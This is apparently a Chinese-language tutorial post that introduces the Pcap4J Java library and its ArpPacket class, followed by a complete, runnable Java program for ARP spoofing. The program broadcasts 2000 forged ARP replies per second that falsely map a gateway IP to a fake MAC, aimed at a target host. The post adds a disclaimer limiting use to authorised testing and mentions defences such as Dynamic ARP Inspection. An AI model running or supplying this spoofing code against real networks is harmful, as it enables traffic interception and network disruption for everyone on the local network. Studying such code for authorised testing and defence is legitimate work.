Pcap4J

Pcap4J 是一个 Java 库，用于通过网络接口捕获和发送数据包。它提供了一个简单的 API，使开发人员能够在 Java 应用程序中轻松实现网络数据包捕获、分析和生成。Pcap4J 基于 libpcap 库，这是一种广泛使用的 C 库，用于网络数据包捕获和分析。

主要特点和功能：

1. 数据包捕获：Pcap4J 可以通过网络接口捕获数据包，并提供对数据包内容的访问和分析功能。
2. 数据包发送：Pcap4J 允许用户通过网络接口发送自定义构造的数据包。
3. 跨平台支持：Pcap4J 支持在多个操作系统上运行，包括 Windows、Linux 和 macOS，只要系统上安装了 libpcap 或 WinPcap/Npcap。
4. 丰富的数据包类型支持：Pcap4J 支持多种类型的数据包，包括以太网、IP、TCP、UDP、ARP 等，用户可以轻松地创建和解析这些数据包。
5. 过滤器：Pcap4J 支持使用 Berkeley Packet Filter (BPF) 语法定义捕获过滤器，以便只捕获感兴趣的数据包。
6. 多线程支持：Pcap4J 设计为线程安全，允许在多线程环境中使用。

ArpPacket

ArpPacket 是 Pcap4J 库中用于表示 ARP（地址解析协议）数据包的类。ARP 是一种网络协议，用于将网络层地址（如 IPv4 地址）映射到数据链路层地址（如以太网 MAC 地址）。在网络通信中，ARP 广泛用于查找局域网内的节点。

主要特点和功能：

1. ARP 数据包结构：ArpPacket 类表示 ARP 请求和回复数据包，包含硬件类型、协议类型、硬件地址长度、协议地址长度、操作类型（请求或回复）、源硬件地址、源协议地址、目标硬件地址和目标协议地址等字段。

2. 构建和解析：ArpPacket 类提供了构建和解析 ARP 数据包的方法，使用户可以方便地生成和处理 ARP 数据包。

3. 与以太网数据包集成：ArpPacket 类通常与 EthernetPacket 类一起使用，因为 ARP 数据包通常封装在以太网帧中。

注意事项

•合法性：ARP欺骗仅应在合法授权的网络环境中进行，本代码仅用于网络安全测试或学习目的。

•后果：未经授权的ARP欺骗可能会导致网络中断、数据泄露或法律后果。

•防护：为防止ARP欺骗攻击，可以使用静态ARP表、启用动态ARP检测（Dynamic ARP Inspection，DAI）等防护措施。

package com.fwtest;
import org.pcap4j.core.*;
import org.pcap4j.packet.ArpPacket;
import org.pcap4j.packet.EthernetPacket;
import org.pcap4j.packet.Packet;
import org.pcap4j.packet.namednumber.ArpHardwareType;
import org.pcap4j.packet.namednumber.ArpOperation;
import org.pcap4j.packet.namednumber.EtherType;
import org.pcap4j.util.ByteArrays;
import org.pcap4j.util.MacAddress;
import java.net.InetAddress;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;
public class arp {
    // 网络接口名称
    private static final String NETWORK_INTERFACE = "en22"; 
    // 目标 IP 地址
    private static final String TARGET_IP = "192.168.10.100"; 
    // 欺骗使用的伪造 IP 地址
    private static final String SPOOFED_IP = "192.168.10.1"; 
    // 欺骗使用的伪造 MAC 地址
    private static final String SPOOFED_MAC = "00:11:22:33:44:55"; 
    // 每个时间间隔发送的包数量
    private static final int PACKETS_PER_INTERVAL = 2000; 
    // 发送包的时间间隔（秒）
    private static final int INTERVAL_SECONDS = 1; 
    public static void main(String[] args) {
        try {
            // 获取网络接口
            PcapNetworkInterface nif = Pcaps.getDevByName(NETWORK_INTERFACE);
            if (nif == null) {
                System.out.println("无法获取接口");
                return;
            }
            // 设置抓包参数
            int snapshotLength = 65536; // 捕获数据包的最大字节数
            int readTimeout = 50; // 读超时时间
            PcapHandle handle = nif.openLive(snapshotLength, PcapNetworkInterface.PromiscuousMode.PROMISCUOUS, readTimeout);
            // 创建一个定时任务调度器
            ScheduledExecutorService executor = Executors.newScheduledThreadPool(1);
            executor.scheduleAtFixedRate(() -> {
                try {
                    // 发送 ARP 欺骗包
                    sendArpSpoofingPackets(handle, PACKETS_PER_INTERVAL);
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }, 0, INTERVAL_SECONDS, TimeUnit.SECONDS);
            // 添加程序关闭钩子，确保资源释放
            Runtime.getRuntime().addShutdownHook(new Thread(() -> {
                executor.shutdown();
                try {
                    if (!executor.awaitTermination(1, TimeUnit.SECONDS)) {
                        executor.shutdownNow();
                    }
                } catch (InterruptedException e) {
                    executor.shutdownNow();
                }
                handle.close();
            }));
        } catch (PcapNativeException e) {
            e.printStackTrace();
        }
    }
    // 发送 ARP 欺骗包的方法
    private static void sendArpSpoofingPackets(PcapHandle handle, int numPackets) throws Exception {
        for (int i = 0; i < numPackets; i++) {
            // 构建 MAC 地址和 IP 地址
            MacAddress srcMacAddr = MacAddress.getByName(SPOOFED_MAC);
            MacAddress dstMacAddr = MacAddress.ETHER_BROADCAST_ADDRESS;
            InetAddress srcIpAddr = InetAddress.getByName(SPOOFED_IP);
            InetAddress dstIpAddr = InetAddress.getByName(TARGET_IP);
            // 构建 ARP 包
            ArpPacket.Builder arpBuilder = new ArpPacket.Builder()
                    .hardwareType(ArpHardwareType.getInstance((short) 1)) // 以太网
                    .protocolType(EtherType.IPV4) // IPv4 协议
                    .hardwareAddrLength((byte) MacAddress.SIZE_IN_BYTES) // 硬件地址长度
                    .protocolAddrLength((byte) ByteArrays.INET4_ADDRESS_SIZE_IN_BYTES) // 协议地址长度
                    .operation(ArpOperation.REPLY) // ARP 应答
                    .srcHardwareAddr(srcMacAddr) // 源硬件地址
                    .srcProtocolAddr(srcIpAddr) // 源协议地址
                    .dstHardwareAddr(dstMacAddr) // 目标硬件地址
                    .dstProtocolAddr(dstIpAddr); // 目标协议地址
            // 构建以太网帧
            EthernetPacket.Builder etherBuilder = new EthernetPacket.Builder()
                    .dstAddr(dstMacAddr) // 目标 MAC 地址
                    .srcAddr(srcMacAddr) // 源 MAC 地址
                    .type(EtherType.ARP) // ARP 类型
                    .payloadBuilder(arpBuilder) // 负载为 ARP 包
                    .paddingAtBuild(true); // 自动填充以太网帧
            // 构建数据包
            Packet packet = etherBuilder.build();
            // 发送数据包
            handle.sendPacket(packet);
            // Thread.sleep(10); // 调整休眠时间来控制发送速率
        }
    }
}